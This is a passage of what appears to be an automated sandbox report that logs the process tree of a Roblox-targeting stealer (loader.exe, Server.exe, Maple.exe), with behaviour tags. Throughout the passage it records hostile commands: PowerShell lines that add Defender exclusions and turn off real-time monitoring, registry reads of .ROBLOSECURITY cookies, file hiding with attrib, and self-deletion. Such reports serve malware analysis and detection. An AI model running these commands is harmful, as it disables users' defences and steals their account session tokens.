        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        20⤵
        Detects videocard installed
        
        PID:2360
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2176
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        19⤵
        Executes dropped EXE
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        20⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        20⤵
        Executes dropped EXE
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        20⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        21⤵
        System Location Discovery: System Language Discovery
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        21⤵
        
        PID:1288
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        21⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        22⤵
        System Location Discovery: System Language Discovery
        
        PID:584
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        22⤵
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:2708
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        23⤵
        Views/modifies file attributes
        
        PID:2528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        23⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        23⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        23⤵
        
        PID:1192
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        23⤵
        
        PID:2808
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        23⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        23⤵
        Detects videocard installed
        
        PID:2936
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2956
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        22⤵
        
        PID:2424
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        23⤵
        System Location Discovery: System Language Discovery
        
        PID:784
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        23⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        23⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        24⤵
        System Location Discovery: System Language Discovery
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        24⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        24⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        25⤵
        System Location Discovery: System Language Discovery
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        25⤵
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:2708
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        26⤵
        Views/modifies file attributes
        
        PID:1688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        26⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:2580
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:2212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:2876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:2564
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1888
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1156
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        25⤵
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        26⤵
        System Location Discovery: System Language Discovery
        
        PID:1160
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        26⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        26⤵
        
        PID:1136
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        27⤵
        System Location Discovery: System Language Discovery
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        27⤵
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        27⤵
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        28⤵
        System Location Discovery: System Language Discovery
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        28⤵
        
        PID:1764
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        28⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        29⤵
        System Location Discovery: System Language Discovery
        
        PID:2204
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        29⤵
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2104
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:1500
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        30⤵
        Views/modifies file attributes
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        30⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        30⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        30⤵
        
        PID:2016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        30⤵
        
        PID:2608
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:1216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        30⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        30⤵
        Detects videocard installed
        
        PID:2332
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2172
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        29⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        30⤵
        System Location Discovery: System Language Discovery
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        30⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        30⤵
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        31⤵
        System Location Discovery: System Language Discovery
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        31⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        31⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        32⤵
        System Location Discovery: System Language Discovery
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        32⤵
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:2576
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        33⤵
        Views/modifies file attributes
        
        PID:1480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        33⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        33⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2140
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        33⤵
        
        PID:2748
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        33⤵
        
        PID:1592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:1484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        33⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2580
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        33⤵
        Detects videocard installed
        
        PID:2708
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1916
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        32⤵
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        33⤵
        System Location Discovery: System Language Discovery
        
        PID:792
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        33⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        33⤵
        
        PID:1724
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        34⤵
        System Location Discovery: System Language Discovery
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        34⤵
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        34⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        35⤵
        System Location Discovery: System Language Discovery
        
        PID:2816
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        35⤵
        Drops file in Drivers directory
        
        PID:1964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:1536
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        36⤵
        Views/modifies file attributes
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        36⤵
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        
        PID:1428
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        36⤵
        
        PID:1484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        36⤵
        
        PID:2300
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:2452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        36⤵
        Detects videocard installed
        
        PID:840
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:624
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        35⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        36⤵
        
        PID:580
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        36⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        36⤵
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        37⤵
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        37⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        37⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        38⤵
        System Location Discovery: System Language Discovery
        
        PID:2772
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        38⤵
        Drops file in Drivers directory
        
        PID:2876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:1664
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        39⤵
        Views/modifies file attributes
        
        PID:432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        39⤵
        
        PID:1216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        
        PID:1016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        39⤵
        
        PID:1932
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        39⤵
        
        PID:2844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:3024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        39⤵
        Detects videocard installed
        
        PID:2604
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Maple.exe" && pause
        39⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3000
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        38⤵
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        39⤵
        System Location Discovery: System Language Discovery
        
        PID:2500
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        39⤵
        
        PID:1568
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        39⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        40⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        40⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        40⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        41⤵
        System Location Discovery: System Language Discovery
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        41⤵
        Drops file in Drivers directory
        
        PID:1248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        42⤵
        
        PID:2032
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        42⤵
        Views/modifies file attributes
        
        PID:968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
        42⤵
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
